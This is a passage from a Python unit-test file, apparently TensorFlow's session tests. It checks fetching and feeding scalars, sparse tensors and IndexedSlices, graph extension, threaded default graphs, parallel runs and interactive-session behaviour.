self.assertAllEqual([[1.0, 1.0]], results_with_nested_list[0][0][0])
self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]],
results_with_nested_list[0][0][1])
self.assertAllEqual(results_with_nested_list[0][0][0],
results_with_nested_list[1])
self.assertAllEqual(results_with_nested_list[1],
results_with_nested_list[2][0])
self.assertAllEqual(results_with_nested_list[0][0][1],
results_with_nested_list[0][1])
self.assertAllEqual(results_with_nested_list[0][1],
results_with_nested_list[2][1])
def testFetchScalar(self):
with session.Session() as s:
for scalar in np.int32, np.int64, np.float16, np.float32, np.float64:
x = scalar(7)
y = scalar(8)
tf_x = constant_op.constant(x, shape=[])
tf_y = constant_op.constant(y)
tf_xy = math_ops.add(tf_x, tf_y)
# Single fetch
xy = s.run(tf_xy)
self.assertEqual(scalar, type(xy))
self.assertEqual(x + y, xy)
# List fetch
xy, = s.run([tf_xy])
self.assertEqual(scalar, type(xy))
self.assertEqual(x + y, xy)
# Dict fetch
xy = s.run({'xy': tf_xy})['xy']
self.assertEqual(scalar, type(xy))
self.assertEqual(x + y, xy)
# Nested list fetch
xy = s.run([[[tf_xy]], tf_xy, [tf_xy]])
self.assertAllEqual(xy, [[[x + y]], x + y, [x + y]])
self.assertEqual(scalar, type(xy[0][0][0]))
self.assertEqual(scalar, type(xy[1]))
self.assertEqual(scalar, type(xy[2][0]))
def testFetchOperationObject(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
v = variables.Variable(a, name='testFetchOperationObject_v')
s.run(v.initializer)
v_val = s.run(v)
self.assertAllEqual([[1.0, 1.0]], v_val)
def testFetchSparseTensor(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = sparse_tensor.SparseTensor(
constant_op.constant(indices), constant_op.constant(values),
constant_op.constant(shape))
# Single fetch, use as tuple
sp_out = s.run(sp)
indices_out, values_out, shape_out = sp_out
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Single fetch, use as SparseTensorValue
sp_out = s.run(sp)
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.dense_shape, shape)
# Tuple fetch, use as tuple
indices_out, values_out, shape_out = s.run(sp)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# List fetch, use as tuple
(indices_out, values_out, shape_out), = s.run([sp])
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# List fetch, use as SparseTensorValue
sp_out, = s.run([sp])
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.dense_shape, shape)
# Dict fetch (single value), use as tuple
indices_out, values_out, shape_out = s.run({'sp': sp})['sp']
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Dict fetch (list value), use as tuple
(indices_out, values_out, shape_out), = s.run({'sp': [sp]})['sp']
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Dict fetch, use as SparseTensorValue
sp_out = s.run({'sp': sp})['sp']
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.dense_shape, shape)
# Nested list fetch use as tuple
sp_out = s.run([[[sp]], sp])
indices_out, values_out, shape_out = sp_out[0][0][0]
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
indices_out, values_out, shape_out = sp_out[1]
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Nested list fetch, use as SparseTensorValue
sp_out = s.run([[[sp]], sp])
self.assertAllEqual(sp_out[0][0][0].indices, indices)
self.assertAllEqual(sp_out[0][0][0].values, values)
self.assertAllEqual(sp_out[0][0][0].dense_shape, shape)
self.assertAllEqual(sp_out[1].indices, indices)
self.assertAllEqual(sp_out[1].values, values)
self.assertAllEqual(sp_out[1].dense_shape, shape)
def testFeedSparseTensor(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = sparse_tensor.SparseTensor(
array_ops.placeholder(dtype=np.int64, shape=(2, 3)),
array_ops.placeholder(dtype=np.float32, shape=(2,)),
array_ops.placeholder(dtype=np.int64, shape=(3,)),
)
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.dense_shape)
sp2 = sparse_tensor.SparseTensor(sp_indices, sp_values, sp_shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: (indices, values, shape)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with tuple, fetch sp directly
sp_out = s.run(sp, {sp: (indices, values, shape)})
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.dense_shape, shape)
# Feed with SparseTensorValue
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue, fetch SparseTensorValue
sp2_out = s.run(sp2, {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(sp2_out.indices, indices)
self.assertAllEqual(sp2_out.values, values)
self.assertAllEqual(sp2_out.dense_shape, shape)
# Feed SparseTensorValue and fetch sp directly.
sp_out = s.run(sp, {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.dense_shape, shape)
def testFeedSparsePlaceholder(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = array_ops.sparse_placeholder(dtype=np.float32, name='placeholder1')
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.dense_shape)
sp2 = sparse_tensor.SparseTensor(sp_indices, sp_values, sp_shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: (indices, values, shape)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue, fetch SparseTensorValue
sp2_out = s.run(sp2, {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(sp2_out.indices, indices)
self.assertAllEqual(sp2_out.values, values)
self.assertAllEqual(sp2_out.dense_shape, shape)
def testFeedSparsePlaceholderPartialShape(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = array_ops.sparse_placeholder(
shape=[None, 9, 2], dtype=np.float32, name='placeholder1')
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.dense_shape)
sp2 = sparse_tensor.SparseTensor(sp_indices, sp_values, sp_shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: (indices, values, shape)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue, fetch SparseTensorValue
sp2_out = s.run(sp2, {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(sp2_out.indices, indices)
self.assertAllEqual(sp2_out.values, values)
self.assertAllEqual(sp2_out.dense_shape, shape)
def testFeedSparsePlaceholderConstantShape(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = array_ops.sparse_placeholder(
dtype=np.float32, shape=shape, name='placeholder1')
self.assertAllEqual(sp.dense_shape.eval(session=s), shape)
self.assertAllEqual(tensor_util.constant_value(sp.dense_shape), shape)
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.dense_shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: (indices, values)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
def testFetchIndexedSlices(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
dense_shape = np.array([7, 9, 2]).astype(np.int64)
ind = ops.IndexedSlices(
constant_op.constant(values), constant_op.constant(indices),
constant_op.constant(dense_shape))
# Single fetch, use as tuple
ind_out = s.run(ind)
values_out, indices_out, dense_shape_out = ind_out
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Single fetch, use as IndexedSlicesValue
ind_out = s.run(ind)
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
# Tuple fetch, use as tuple
values_out, indices_out, dense_shape_out = s.run(ind)
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as tuple
(values_out, indices_out, dense_shape_out), = s.run([ind])
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as IndexedSlicesValue
ind_out, = s.run([ind])
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
def testFeedIndexedSlices(self):
with session.Session() as s:
values = np.array([1.0, 2.0]).astype(np.float32)
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
dense_shape = np.array([7, 9, 2]).astype(np.int64)
ind = ops.IndexedSlices(
array_ops.placeholder(dtype=np.float32, shape=(2,)),
array_ops.placeholder(dtype=np.int64, shape=(2, 3)),
array_ops.placeholder(dtype=np.int64, shape=(3,)),
)
ind_values = array_ops.identity(ind.values)
ind_indices = array_ops.identity(ind.indices)
ind_dense_shape = array_ops.identity(ind.dense_shape)
ind2 = ops.IndexedSlices(ind_values, ind_indices, ind_dense_shape)
# Feed with tuple
values_out, indices_out, dense_shape_out = s.run(
[ind_values, ind_indices, ind_dense_shape], {
ind: (values, indices, dense_shape)
})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Feed with IndexedSlicesValue
values_out, indices_out, dense_shape_out = s.run(
[ind_values, ind_indices, ind_dense_shape], {
ind: ops.IndexedSlicesValue(values, indices, dense_shape)
})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Feed with IndexedSlicesValue, fetch IndexedSlicesValue
ind2_out = s.run(ind2, {
ind: ops.IndexedSlicesValue(values, indices, dense_shape)
})
self.assertAllEqual(ind2_out.values, values)
self.assertAllEqual(ind2_out.indices, indices)
self.assertAllEqual(ind2_out.dense_shape, dense_shape)
def testFetchIndexedSlicesWithoutDenseShape(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
dense_shape = None
ind = ops.IndexedSlices(
constant_op.constant(values), constant_op.constant(indices), None)
# Single fetch, use as tuple
ind_out = s.run(ind)
values_out, indices_out, dense_shape_out = ind_out
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Single fetch, use as IndexedSlicesValue
ind_out = s.run(ind)
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
# Tuple fetch, use as tuple
values_out, indices_out, dense_shape_out = s.run(ind)
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as tuple
(values_out, indices_out, dense_shape_out), = s.run([ind])
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as IndexedSlicesValue
ind_out, = s.run([ind])
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
def testFeedIndexedSlicesWithoutDenseShape(self):
with session.Session() as s:
values = np.array([1.0, 2.0]).astype(np.float32)
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
dense_shape = None
ind = ops.IndexedSlices(
array_ops.placeholder(dtype=np.float32, shape=(2,)),
array_ops.placeholder(dtype=np.int64, shape=(2, 3)), None)
ind_values = array_ops.identity(ind.values)
ind_indices = array_ops.identity(ind.indices)
ind2 = ops.IndexedSlices(ind_values, ind_indices)
# Feed with tuple
values_out, indices_out = s.run([ind_values, ind_indices], {
ind: (values, indices)
})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
# Feed with IndexedSlicesValue
values_out, indices_out = s.run([ind_values, ind_indices], {
ind: ops.IndexedSlicesValue(values, indices, dense_shape)
})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
# Feed with IndexedSlicesValue, fetch IndexedSlicesValue
ind2_out = s.run(ind2, {
ind: ops.IndexedSlicesValue(values, indices, dense_shape)
})
self.assertAllEqual(ind2_out.values, values)
self.assertAllEqual(ind2_out.indices, indices)
self.assertAllEqual(ind2_out.dense_shape, dense_shape)
def testExtendWithStatelessOperations(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
c_val = s.run(c)
self.assertAllEqual([[4.0, 4.0, 4.0]], c_val)
d = constant_op.constant([1.0, 2.0, 3.0], shape=[3, 1])
e = math_ops.matmul(c, d)
# Extend will happen here.
e_val = s.run(e)
self.assertAllEqual([[24.0]], e_val)
def testExtendWithStatefulOperations(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='testExtendWithStatefulOperations_v')
v.initializer.run()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
# Extend will happen here.
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
def testExtendWithGroupBy(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
p = variables.Variable(a, name='testExtendWithGroupBy_p')
a_val = a.eval() # Force an Extend after this op.
self.assertAllEqual([[1.0, 1.0]], a_val)
b = constant_op.constant(2.0, shape=[1, 2])
q = variables.Variable(b, name='testExtendWithGroupBy_q')
# Extend will happen here.
init = control_flow_ops.group(p.initializer, q.initializer)
s.run(init)
p_val, q_val = s.run([p, q])
self.assertAllEqual([[1.0, 1.0]], p_val)
self.assertAllEqual([[2.0, 2.0]], q_val)
def testTensorGetMethod(self):
with session.Session():
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
c_val = c.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], c_val)
fed_c_val = c.eval(feed_dict={a.name: [[4.0, 4.0]]})
self.assertAllEqual([[16.0, 16.0, 16.0]], fed_c_val)
def testOperationRunMethod(self):
with session.Session():
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[1, 2], name='b')
v = variables.VariableV1(a, a.dtype)
assign_a_to_v = state_ops.assign(v, a)
assign_a_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[1.0, 1.0]], v_val)
assign_b_to_v = state_ops.assign(v, b)
assign_b_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[2.0, 2.0]], v_val)
assign_b_to_v.eval(feed_dict={'b:0': [[3.0, 3.0]]})
v_val = v.eval()
self.assertAllEqual([[3.0, 3.0]], v_val)
def testDefaultGraph(self):
with session.Session() as s:
self.assertEqual(ops.get_default_graph(), s.graph)
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
self.assertEqual(ops.get_default_graph(), a.graph)
self.assertEqual(ops.get_default_graph(), b.graph)
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='testDefaultGraph_v')
v.initializer.run()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
self.assertEqual(ops.get_default_graph(), s.graph)
def _testDefaultGraphInThread(self, constructed_event, continue_event, i):
with session.Session() as s:
self.assertEqual(ops.get_default_graph(), s.graph)
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='var_%d' % i)
# Block here until all threads have constructed their graph.
constructed_event.set()
continue_event.wait()
assign_c_to_v = state_ops.assign(v, c)
v.initializer.run()
assign_c_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
self.assertEqual(ops.get_default_graph(), s.graph)
def testDefaultGraphWithThreads(self):
# Fork ten threads that use their thread-local default graph.
threads = []
constructed_events = [threading.Event() for _ in range(10)]
continue_event = threading.Event()
for i, constructed_event in enumerate(constructed_events):
t = self.checkedThread(
target=self._testDefaultGraphInThread,
args=(constructed_event, continue_event, i))
threads.append(t)
for t in threads:
t.start()
for constructed_event in constructed_events:
constructed_event.wait()
continue_event.set()
for t in threads:
t.join()
def testParallelRun(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
ev = threading.Event()
def run_step():
ev.wait()
val = c.eval(session=sess)
self.assertEqual(val, 5.0)
threads = [self.checkedThread(target=run_step) for _ in range(100)]
for t in threads:
t.start()
ev.set()
for t in threads:
t.join()
@staticmethod
def _build_graph():
time.sleep(random.random() * 0.1)
# Do some graph construction. Try to exercise non-trivial paths.
graph = ops.get_default_graph()
gdef = None
for _ in range(10):
x = array_ops.placeholder(dtype=dtypes.float32)
with ops.colocate_with(x):
y = array_ops.placeholder(dtype=dtypes.float32)
with ops.device('/cpu:0'):
z = control_flow_ops.while_loop(
lambda x, y: x < 10, lambda x, y: (x + 1, x * y), [x, y])
with graph._attr_scope({'_a': attr_value_pb2.AttrValue(b=False)}):
gradients_impl.gradients(z, [x, y])
if gdef is None:
gdef = graph.as_graph_def()
else:
importer.import_graph_def(gdef, name='import')
def testParallelRunAndSingleBuild(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
stop = threading.Event()
def run_loop():
while not stop.is_set():
time.sleep(random.random() * 0.1)
self.assertEqual(sess.run(c), 5.0)
threads = [self.checkedThread(target=run_loop) for _ in range(10)]
for t in threads:
t.start()
SessionTest._build_graph()
stop.set()
for t in threads:
t.join()
def testParallelRunAndParallelBuild(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
stop = threading.Event()
def run_loop():
while not stop.is_set():
time.sleep(random.random() * 0.1)
self.assertEqual(sess.run(c), 5.0)
run_threads = [self.checkedThread(target=run_loop) for _ in range(10)]
for t in run_threads:
t.start()
build_threads = [self.checkedThread(target=SessionTest._build_graph)
for _ in range(10)]
for t in build_threads:
t.start()
for t in build_threads:
t.join()
# Let the run_threads run until the build threads are finished.
stop.set()
for t in run_threads:
t.join()
def testRunFeedDict(self):
with session.Session() as s:
x = array_ops.zeros([2])
y = s.run(2 * x, feed_dict={x: np.ones(2).astype(np.float32)})
self.assertAllEqual(y, 2 * np.ones(2))
y = s.run(2 * x, feed_dict={x.name: np.ones(2).astype(np.float32)})
self.assertAllEqual(y, 2 * np.ones(2))
y = s.run(2 * x, feed_dict={x: [1, 1]})
assert (y == 2 * np.ones(2)).all()
# Test nested tuple keys
z = (((array_ops.zeros([2]),),), array_ops.zeros([2]),
(array_ops.zeros([2]),))
result = [z[0][0][0] * 2, z[1] * 2, z[2][0] * 2]
values = (((np.array([1, 1]),),), np.array([2, 2]), (np.array([3, 3]),))
result_value = s.run(result, feed_dict={z: values})
self.assertAllEqual(result_value[0], 2 * np.ones(2))
self.assertAllEqual(result_value[1], 2 * np.array([2, 2]))
self.assertAllEqual(result_value[2], 2 * np.array([3, 3]))
def testGraphDef(self):
with session.Session() as sess:
self.assertProtoEquals('versions { producer: %d min_consumer: %d }' %
(versions.GRAPH_DEF_VERSION,
versions.GRAPH_DEF_VERSION_MIN_CONSUMER),
sess.graph_def)
c = constant_op.constant(5.0, name='c')
self.assertEquals(len(sess.graph_def.node), 1)
d = constant_op.constant(6.0, name='d')
self.assertEquals(len(sess.graph_def.node), 2)
self.assertAllEqual(c.eval(), 5.0)
self.assertAllEqual(d.eval(), 6.0)
e = constant_op.constant(7.0, name='e')
self.assertEquals(len(sess.graph_def.node), 3)
self.assertAllEqual(e.eval(), 7.0)
def testUseAfterClose(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
self.assertAllEqual(sess.run(c), 5.0)
with self.assertRaisesWithPredicateMatch(
RuntimeError, lambda e: 'Attempted to use a closed Session.' in str(e)):
sess.run(c)
def testUseAfterCloseConcurrent(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
self.assertAllEqual(sess.run(c), 5.0)
def update_thread():
with self.assertRaisesWithPredicateMatch(
RuntimeError,
lambda e: 'Attempted to use a closed Session.' in str(e)):
while True:
sess.run(c)
t = threading.Thread(target=update_thread)
t.start()
time.sleep(0.1)
sess.close()
t.join()
def testUseEmptyGraph(self):
with session.Session() as sess:
with self.assertRaisesRegexp(RuntimeError, 'The Session graph is empty.'):
sess.run([])
with self.assertRaisesRegexp(RuntimeError, 'The Session graph is empty.'):
sess.run(())
with self.assertRaisesRegexp(RuntimeError, 'The Session graph is empty.'):
sess.run({})
def testNotEntered(self):
# pylint: disable=protected-access
self.assertEqual(ops._default_session_stack.get_default(), None)
# pylint: enable=protected-access
with ops.device('/cpu:0'):
sess = session.Session()
c_1 = constant_op.constant(5.0)
with sess.graph.as_default():
c_2 = constant_op.constant(5.0)
self.assertEqual(c_1.graph, c_2.graph)
self.assertEqual(sess.run(c_2), 5.0)
with self.assertRaisesWithPredicateMatch(
ValueError, lambda e: 'No default session is registered.' in str(e)):
c_2.eval()
def testInteractive(self):
with ops.device('/cpu:0'):
sess = session.InteractiveSession()
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
self.assertAllEqual([[4.0, 4.0, 4.0]], c.eval())
d = constant_op.constant([1.0, 2.0, 3.0], shape=[3, 1])
e = math_ops.matmul(c, d)
self.assertAllEqual([[24.0]], e.eval())
sess.close()
def testMultipleInteractiveSessionsWarning(self):
# Reinitialize the global state to ensure that the expected warnings will
# be emitted.
session.InteractiveSession._active_session_count = 0 # pylint: disable=protected-access
sess = session.InteractiveSession()
sess.run(constant_op.constant(4.0)) # Run so that the session is "opened".
sess.close()
# Opening and closing interactive sessions serially should not warn.
with warnings.catch_warnings(record=True) as w:
sess = session.InteractiveSession()
sess.close()
self.assertEqual(0, len(w))
with warnings.catch_warnings(record=True) as w:
sess = session.InteractiveSession()
self.assertEqual(0, len(w))
with warnings.catch_warnings(record=True) as w:
sess2 = session.InteractiveSession()
self.assertEqual(1, len(w))
self.assertTrue('An interactive session is already active. This can cause '
'out-of-memory errors in some cases. You must explicitly '
'call `InteractiveSession.close()` to release resources '
'held by the other session(s).' in str(w[0].message))
sess2.close()
sess.close()
def testInteractivePlacePrunedGraph(self):
sess = session.InteractiveSession()
# Build a graph that has a bad op in it (no kernel).
#
# This test currently does not link in any GPU kernels,
# which is why placing this is invalid. If at some point
# GPU kernels are added to this test, some other different
# op / device combo should be chosen.
with ops.device('/device:GPU:0'):
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(1.0, shape=[1, 2])
# Only run the valid op, this should work.
b.eval()
with self.assertRaises(errors.InvalidArgumentError):
a.eval()
sess.close()
def testDefaultSessionPlacePrunedGraph(self):
sess = session.Session()
# Build a graph that has a bad op in it (no kernel).
#
# This test currently does not link in any GPU kernels,
# which is why placing this is invalid. If at some point
# GPU kernels are added to this test, some other different
# op / device combo should be chosen.
with ops.device('/device:GPU:0'):
_ = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(1.0, shape=[1, 2])
with self.assertRaises(errors.InvalidArgumentError):
# Even though we don't run the bad op, we place the entire
# graph, which should fail with a non-interactive session.
sess.run(b)
sess.close()
def testSharedGraph(self):
with ops.Graph().as_default() as g, ops.device('/cpu:0'):
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
with session.Session(graph=g) as sess1:
with session.Session(graph=g) as sess2:
self.assertAllEqual(sess1.run(c), sess2.run(c))
def testDuplicatedInputs(self):
with session.Session() as sess:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[1, 3])
a_val, b_val, a2_val = sess.run([a, b, a])
self.assertAllEqual(a_val, [[1.0, 1.0]])
self.assertAllEqual(b_val, [[2.0, 2.0, 2.0]])
self.assertAllEqual(a2_val, [[1.0, 1.0]])
def testFeedAndFetch(self):
with session.Session() as sess:
for dtype in [
dtypes.float16, dtypes.float32, dtypes.float64, dtypes.int32,
dtypes.uint8, dtypes.int16, dtypes.int8, dtypes.int64, dtypes.bool,
dtypes.complex64, dtypes.complex128
]:
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
np_dtype = dtype.as_numpy_dtype
feed_t = array_ops.placeholder(dtype=dtype, shape=shape)
out_t = array_ops.identity(feed_t)
np_array = np.random.randint(-10, 10, shape)
if dtype == dtypes.bool:
np_array = np_array > 0
elif dtype == dtypes.complex64:
np_array = np.sqrt(np_array.astype(np_dtype))
elif dtype == dtypes.complex64:
np_array = np.sqrt(np_array.astype(np_dtype))
else:
np_array = np_array.astype(np_dtype)
self.assertAllEqual(np_array,
sess.run(out_t, feed_dict={
feed_t: np_array
}))
# Check that we can also get the feed back.
self.assertAllEqual(np_array,
sess.run(feed_t, feed_dict={
feed_t: np_array
}))
# Also check that we can get both back.
out_v, feed_v = sess.run(
[out_t, feed_t], feed_dict={
feed_t: np_array
})
self.assertAllEqual(np_array, out_v)
self.assertAllEqual(np_array, feed_v)
feed_fetch_runner = sess.make_callable([out_t, feed_t], [feed_t])
out_v, feed_v = feed_fetch_runner(np_array)
self.assertAllEqual(np_array, out_v)
self.assertAllEqual(np_array, feed_v)
def testMakeCallableOnTensorWithRunOptions(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
tensor_runner = sess.make_callable(a, accept_options=True)
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
self.assertEqual(0, len(run_metadata.step_stats.dev_stats))
res = tensor_runner(options=run_options, run_metadata=run_metadata)
self.assertEqual(42.0, res)
self.assertGreater(len(run_metadata.step_stats.dev_stats), 0)
def testMakeCallableOnOperationWithRunOptions(self):
with session.Session() as sess:
a = variables.Variable(42.0)
b = state_ops.assign_add(a, 1.0)
sess.run(a.initializer)
tensor_runner = sess.make_callable(b.op, accept_options=True)
run_options = config_pb2.RunOptions(
